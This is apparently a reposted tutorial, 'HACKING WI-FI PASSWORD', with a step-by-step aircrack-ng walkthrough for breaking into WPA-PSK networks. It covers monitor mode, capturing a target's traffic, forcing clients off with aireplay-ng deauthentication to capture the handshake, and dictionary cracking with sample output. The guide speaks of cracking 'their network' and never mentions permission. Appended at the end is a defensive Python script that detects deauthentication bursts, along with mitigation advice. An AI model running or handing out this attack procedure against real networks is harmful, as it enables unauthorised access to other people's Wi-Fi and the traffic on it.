HACKING WI-FI PASSWORD
How To Crack Wireless Networks WPA psk/psk2
*Requirements
Linux OS (almost any will work)
Aircrack-ng suite
MadWifi driver ** search for it on Google **
A good dictionary file
** If you are using BackTrack or another live CD, these things are probably already built in.
STARTING:
Alright, before doing any of this, make sure your network card is compatible with aircrack and madwifi! Some cards don't wake up after you put them in monitor mode.
OK, log in as root and go to a terminal.
[root@localhost ~]# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
Now just put your card in monitor mode:
[root@localhost ~]# airmon-ng stop ath0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
[root@localhost ~]# airmon-ng start wifi0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (monitor mode enabled)
Now just
type: ifconfig ath0 up
type: iwconfig
[root@localhost ~]# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.
pan0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.437 GHz Access Point: **:**:**:**:**:**
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/70 Signal level=-93 dBm Noise level=-93 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
CAPTURING:
OK, now you have to start capturing your target's network, so first open a new terminal window.
airodump-ng ath0
This shows all the networks you can capture in your area. Find the network you want to crack that is WPA protected, and copy the BSSID (MAC address).
**DIRECTIONS**
airodump-ng:
-c The channel that your target is on
example: airodump-ng -c 6
-w The name you want to save the capture as
example: airodump-ng -c 6 -w wpapsk
example2: /root/wpapsk-01.cap
--bssid The BSSID that you want to capture (the one you copied)
example: airodump-ng -c 6 -w wpapsk --bssid **:**:**:**:**:**
ath0 The interface you are using
example: airodump-ng -c 6 -w wpapsk --bssid **:**:**:**:**:** ath0
**END OF DIRECTIONS**
Alright, now type: airodump-ng -c XX -w whateveruwant --bssid **:**:**:**:**:** ath0
CH 6 ][ Elapsed: 2 mins ][ 2008-11-23 3:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
**:**:**:**:**:** 12 100 2495 7 0 6 54 WPA TKIP PSK BOBNET
BSSID STATION PWR Rate Lost Packets Probes
NOW WAIT until a client connects to the network.
AIREPLAY:
Next you're going to use aireplay to send attacks.
**DIRECTIONS**
aireplay-ng
xx = mine
** = target's
-0 5 This sends 5 attacks to the target
example: aireplay-ng -0 5
-a The target wireless network's BSSID
example: aireplay-ng -0 5 -a **:**:**:**:**:**
-c Your access point BSSID (remember iwconfig that I told you to leave open)
example: aireplay-ng -0 5 -a **:**:**:**:**:** -c xx:xx:xx:xx:xx:xx
ath0 The interface, and you're ready to go!
example:
aireplay-ng -0 5 -a **:**:**:**:**:** -c xx:xx:xx:xx:xx:xx ath0
** END OF DIRECTIONS **
CRACKING:
When your airodump finally shows this:
CH 6 ][ Elapsed: 2 mins ][ 2008-11-23 3:51 [WPA HANDSHAKE FOUND]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
**:**:**:**:**:** 12 100 2495 7 0 6 54 WPA TKIP PSK ************
BSSID STATION PWR Rate Lost Packets Probes
Then you can now crack their network!
FIRST YOU NEED A DICTIONARY FILE
Make sure you know the directory it's in.
**DIRECTIONS**
aircrack-ng
[the directory not a command]
example: aircrack-ng /root/w.ethenamewas-01.cap
-w The dictionary file (the whole directory), and then run the command!!
[root@localhost ~]# aircrack-ng /root/w.ethenamewas-01.cap -w /usr/share/dict/linux.words
**END OF DIRECTIONS**
Once you run the command it should start cracking...
Aircrack-ng 1.0 rc1
[00:00:02] 622 keys tested (303.68 k/s)
Current passphrase: abscision
Master Key : 38 1A FF 6F C1 D1 B5 EE D5 73 FC A7 48 54 4E 1E
2E A8 A1 55 BD E2 2E 36 63 49 C0 96 DF CA 7E 5A
Transcient Key : 6F A6 0D 93 46 F9 A2 6B AB 31 96 31 F9 C6 5F 51
83 91 86 59 30 A0 DB 95 43 5F D4 72 BA 5D BD B1
51 98 06 9B 7D E8 DD 4D AA 37 B3 E6 1F DF 1F 50
71 35 B9 2F 33 6F 89 1B E2 13 89 74 E5 E6 16 17
EAPOL HMAC : 68 B3 E9 AB 56 01 6C D8 A6 BE 4D B6 C2 0C 9D D0
THIS WILL ONLY WORK IF THE PASSWORD IS SOMEWHERE IN YOUR DICTIONARY!!
**This concludes my guide to crack wireless networks!!
Source:
http://hackingarticles.com/wpa-cracking/
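The forced-reconnect step in the guide is visible from the monitoring side. The following is an added example, not part of the original post or of the aircrack-ng suite: it flags bursts of deauthentication frames (the frame type aireplay-ng -0 sends) aimed at one client and records whether a WPA handshake followed. The record layout, MAC addresses, thresholds and the function name find_deauth_bursts are assumptions made for the example.

```python
from collections import defaultdict, deque

AP = "02:00:00:00:00:01"            # constructed, locally administered MACs
STA_A, STA_B = "02:00:00:00:00:aa", "02:00:00:00:00:bb"

# Constructed monitor-mode records: (seconds, frame type, bssid, station).
# This record layout is an assumption for the example, not a tool's format.
FRAMES = [
    (10.0, "deauth", AP, STA_A),    # a lone deauth is ordinary roaming
    (40.0, "eapol", AP, STA_A),
    (95.0, "deauth", AP, STA_B),    # five deauths in under a second
    (95.2, "deauth", AP, STA_B),
    (95.4, "deauth", AP, STA_B),
    (95.6, "deauth", AP, STA_B),
    (95.8, "deauth", AP, STA_B),
    (97.5, "eapol", AP, STA_B),     # client re-runs the WPA handshake
]


def find_deauth_bursts(frames, threshold=5, window=2.0, follow=10.0):
    """Return one alert per (bssid, station) pair that received at least
    `threshold` deauth frames within `window` seconds, recording whether an
    EAPOL handshake followed the burst within `follow` seconds."""
    recent = defaultdict(deque)     # pair -> timestamps of recent deauths
    alerts = {}                     # pair -> alert record
    for ts, ftype, bssid, station in sorted(frames):
        pair = (bssid, station)
        if ftype == "deauth":
            q = recent[pair]
            q.append(ts)
            while ts - q[0] > window:       # slide the time window forward
                q.popleft()
            if len(q) >= threshold:
                alert = alerts.setdefault(pair, {
                    "bssid": bssid, "station": station,
                    "handshake_followed": False})
                alert["burst_end"] = ts
        elif ftype == "eapol" and pair in alerts:
            if ts - alerts[pair]["burst_end"] <= follow:
                alerts[pair]["handshake_followed"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for a in find_deauth_bursts(FRAMES):
        print(a)
```

Where the access point and clients support it, enabling 802.11w (protected management frames) makes clients discard forged deauthentication frames, and a long passphrase that appears in no word list defeats the dictionary step.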